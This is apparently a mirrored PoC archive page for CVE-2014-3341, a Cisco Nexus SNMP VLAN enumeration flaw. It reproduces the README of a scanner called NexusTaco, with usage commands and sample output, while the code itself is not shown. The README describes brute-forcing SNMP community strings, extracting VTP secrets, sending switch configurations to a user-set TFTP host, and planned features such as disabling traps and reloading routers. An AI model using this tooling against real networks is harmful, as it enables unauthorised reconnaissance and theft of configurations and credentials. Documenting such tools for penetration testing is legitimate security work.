Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2014-3341 PoC — Cisco NX-OS SNMP模块信息泄露漏洞

Source
Associated Vulnerability
Title:Cisco NX-OS SNMP模块信息泄露漏洞 (CVE-2014-3341)
Description:The SNMP module in Cisco NX-OS 7.0(3)N1(1) and earlier on Nexus 5000 and 6000 devices provides different error messages for invalid requests depending on whether the VLAN ID exists, which allows remote attackers to enumerate VLANs via a series of requests, aka Bug ID CSCup85616.
Description
CVE-2014-3341 exploit
Readme
snmpvlan
========
CVE ID: CVE-2014-3341.

Cisco Bug ID: CSCup85616.

NexusTaco is a snmp scanner that can be used both for internal testing and external testing to assess Cisco Nexus switches ( 5000 and 6000 family). 

There are many snmp scanners and brute forcers this was made for just completeness.It has the following features: 

*Finds Nexus switches specifically since they seem to reply to bogus community strings 

*Bruteforces Vlan ID’s which can be used for Vlan hopping / double tagging attacks without a community incase #3 doesn’t come through (useful for internal tests) 

*Bruteforces snmp community strings To find the following: **System uptime **Configured networks (leverage more ground) 

  **Files and folders 

  **VTP secret and password ( can be cracked since its md5 and might be the telnet login password if exists or used somewhere else) 

  **Once a write community string is found the running configuration file will be send to your set ip in argv[2]. You need to configure a tftp server like solar winds’s one or something. 

TODO: 

*Still looking up sneaky OID’s that can provide usernames that are configured locally on the switch 

*If found private snmp CS check if a AAA server is running (and get the shared secret wether radius or TACACS+) 

*Show logged in users 

*Disable snmp traps 

*Check for port security if configured incase you need to spoof your mac so you don’t loose your port(internal tests). 

*Use getopt ….. 

*Router reload over snmp just for evilness. 

*Anything else I forgot.

$ python NexusTaco.py python NexusTaco.py CIDR 

$ python NexusTaco.py x.x.x.x/32 127.0.0.1 100 

Thanks nmap for the ip list 

Finding vulnerable switches 

x.x.x.x:Is a nexus switch, Snmp open, Has Vlans configured

Finding VlanIDs on: x.x.x.x With incorrect community string

Host: x.x.x.x has VlanID 1 Configured 

Host: x.x.x.x has VlanID 2 Configured 

Host: x.x.x.x has VlanID 3 Configured 

Host: x.x.x.x has VlanID 4 Configured 

Host: x.x.x.x has VlanID 5 Configured 

Host: x.x.x.x has VlanID 6 Configured 

Host: x.x.x.x has VlanID 7 Configured 

Host: x.x.x.x has VlanID 8 Configured 

Host: x.x.x.x has VlanID 10 Configured 

Host: x.x.x.x has VlanID 31 Configured 

Host: x.x.x.x has VlanID 32 Configured 

Host: x.x.x.x has VlanID 33 Configured 

Host: x.x.x.x has VlanID 34 Configured 

Host: x.x.x.x has VlanID 35 Configured 

Host: x.x.x.x has VlanID 40 Configured 

Host: x.x.x.x has VlanID 64 Configured 

Host: x.x.x.x has VlanID 65 Configured 

Host: x.x.x.x has VlanID 97 Configured 

Host: x.x.x.x has VlanID 98 Configured 

Host: x.x.x.x has VlanID 99 Configured 

Host: x.x.x.x has VlanID 100 Configured

.....
File Snapshot

[4.0K] /data/pocs/86bfac93e443ab28bd15c74faae67322b0a2978b ├── [1.1K] License ├── [5.2K] NexusTaco.py ├── [2.6K] README.md └── [ 844] strings.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →